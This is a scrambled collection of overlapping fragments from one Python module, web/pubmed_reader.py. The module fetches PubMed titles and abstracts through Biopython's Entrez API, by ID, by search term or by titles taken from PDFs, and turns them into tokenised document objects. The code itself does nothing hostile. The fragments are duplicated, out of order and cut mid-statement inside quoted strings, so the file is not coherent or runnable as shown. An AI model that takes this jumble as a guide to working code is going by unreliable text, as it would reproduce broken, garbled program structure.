data_structures.document import Document from data_structures.sentence import Sentence", "''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax)", "get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid", "return docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle", "Document from data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary,", "pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = [] for pmid in pmids:", "#Using Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if", "sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles", "= get_data_from_term(term, email, retmax) if pmids is None: return None else: docs, pmids_not_found", "except: return None if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id", "doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type", "passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] !=", "# path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term", "{'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids =", "{'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using Term def", "read from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from", "file in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs,", "if data is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type =", "return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in", "[] for pmid in pmids: sentences = [] data = get_data_from_pmid(pmid, email) if", "email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is None: return", "sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found", "docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None, None", "(SARS-CoV-2) through a drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths", "[] data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if data['Title']", "return pmid except: return None if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf'", "sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences:", "article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title,", "= [] for pmid in pmids: sentences = [] data = get_data_from_pmid(pmid, email)", "pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None, None def get_data_from_pdf(file, email):", "= get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__ == '__main__':", "return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key =", "return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try:", "Bio.Entrez import efetch, read from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__)))", "return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term,", "get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs =", "= Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = []", "None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try: title", "abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract':", "return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids", "read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0]", "'': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if", "nltk from data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token import Token", "sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token", "Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try:", "pmids_not_found = [] for pmid in pmids: sentences = [] data = get_data_from_pmid(pmid,", "= [] data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if", "in pmids: sentences = [] data = get_data_from_pmid(pmid, email) if data is None:", "titles = [] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f,", "pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower,", "novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>',", "email, dl_config) return docs, docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email", "= get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if data['Title'] != '':", "# print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf', 'D:/Desktop/artigos/rdml.pdf', 'D:/Desktop/artigos/Yan.pdf'] pdf_paths_to_titles(paths,", "def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is", "try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title,", "= read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract =", "abstract} except: return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title =", "import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io", "retmax) if pmids is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email,", "for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles", "article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title,", "lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title']", "Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from", "Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs", "def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid),", "xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract}", "if pmids is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config)", "= 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral drugs", "get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config)", "title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract =", "if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 #", "Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def", "except: return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config):", "None if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574", "email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__ == '__main__': # path", "import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = []", "lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower,", "[] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return", "pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths: with open(pdf_path,", "pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def", "from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle", "'<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return", "abstract} except: return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax,", "retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is None: return None", "#id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral", "drugs that may act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction", "except: return None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>'", "'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially", "term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths,", "pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = [] try: for file in", "drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf',", "Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def", "return None if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id =", "pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__ ==", "'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title", "= data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email):", "import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config):", "retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\",", "data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization,", "from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document", "sentences = [] data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else:", "None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def", "Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data =", "Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from", "docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle =", "'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences)", "Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance')", "# print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral drugs that may", "None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try: title =", "pmid in pmids: sentences = [] data = get_data_from_pmid(pmid, email) if data is", "= pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email = email", "20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral drugs that", "= [] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email))", "email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close()", "= efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title", "a drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf',", "print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf', 'D:/Desktop/artigos/rdml.pdf', 'D:/Desktop/artigos/Yan.pdf'] pdf_paths_to_titles(paths, '<EMAIL>.com')", "data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper", "= [] docs_not_found = [] try: for file in files: pmid = get_data_from_pdf(file,", "\"Predicting commercially available antiviral drugs that may act on the novel coronavirus (SARS-CoV-2)", "in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files,", "pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as", "title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except:", "act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\"", "article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except:", "def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = [] try: for file", "email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term,", "that may act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep", "None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email,", "else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation,", "docs_not_found = [] try: for file in files: pmid = get_data_from_pdf(file, email) if", "Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids", "xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract", "pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids,", "pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None, None def", "article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using", "handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path", "stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type =", "get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml')", "pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key", "pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email,", "handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList']", "email): Entrez.email = email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid =", "[] try: for file in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid)", "docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>'", "on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\" #", "stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title =", "try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title':", "email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0]", "available antiviral drugs that may act on the novel coronavirus (SARS-CoV-2) through a", "get_data_from_term(term, email, retmax) if pmids is None: return None else: docs, pmids_not_found =", "email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return", "#Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths: with", "email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record =", "email) if data is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type", "pmids: sentences = [] data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid)", "'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids =", "= xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract':", "data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import", "__name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path,", "'__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) #", "wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email,", "# term = \"Predicting commercially available antiviral drugs that may act on the", "= '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article", "''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return", "'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email,", "get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__ == '__main__': #", "deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf',", "Entrez.email = email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title,", "interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf',", "pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle", "efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title =", "= article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''}", "term = \"Predicting commercially available antiviral drugs that may act on the novel", "dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is None: return None else:", "string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found", "doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title", "pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email =", "= 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '':", "for file in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename)", "= get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email,", "'<EMAIL>')) # term = \"Predicting commercially available antiviral drugs that may act on", "open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids", "as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids = []", "pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = []", "through a drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths =", "= get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if", "= [] try: for file in files: pmid = get_data_from_pdf(file, email) if pmid:", "the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\" # print(get_data_from_term(term,", "'<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except:", "if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs,", "pmids is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return", "else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email", "for pmid in pmids: sentences = [] data = get_data_from_pmid(pmid, email) if data", "pmid except: return None if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' #", "data is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't',", "import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string", "try: for file in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else:", "try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return", "in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found", "f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found", "= [] pmids_not_found = [] for pmid in pmids: sentences = [] data", "get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'],", "'<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article =", "from data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token import Token from", "= email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record", "= Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID", "from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids,", "with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config):", "dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>'", "stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return", "= '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close()", "xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract}", "get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax,", "model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf', 'D:/Desktop/artigos/rdml.pdf', 'D:/Desktop/artigos/Yan.pdf']", "return docs, docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email = email", "[] pmids_not_found = [] for pmid in pmids: sentences = [] data =", "from data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary", "'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email,", "{'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract", "<filename>web/pubmed_reader.py from Bio.Entrez import efetch, read from Bio import Entrez import os import", "may act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning", "import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence", "get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs", "pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found", "os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence import", "lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid)", "docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None,", "antiviral drugs that may act on the novel coronavirus (SARS-CoV-2) through a drug-target", "return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using Term", "handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article']", "id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle']", "title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument']", "sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence import Sentence from", "learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf', 'D:/Desktop/artigos/rdml.pdf',", "dl_config): pmids = [] docs_not_found = [] try: for file in files: pmid", "email): Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data", "record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def 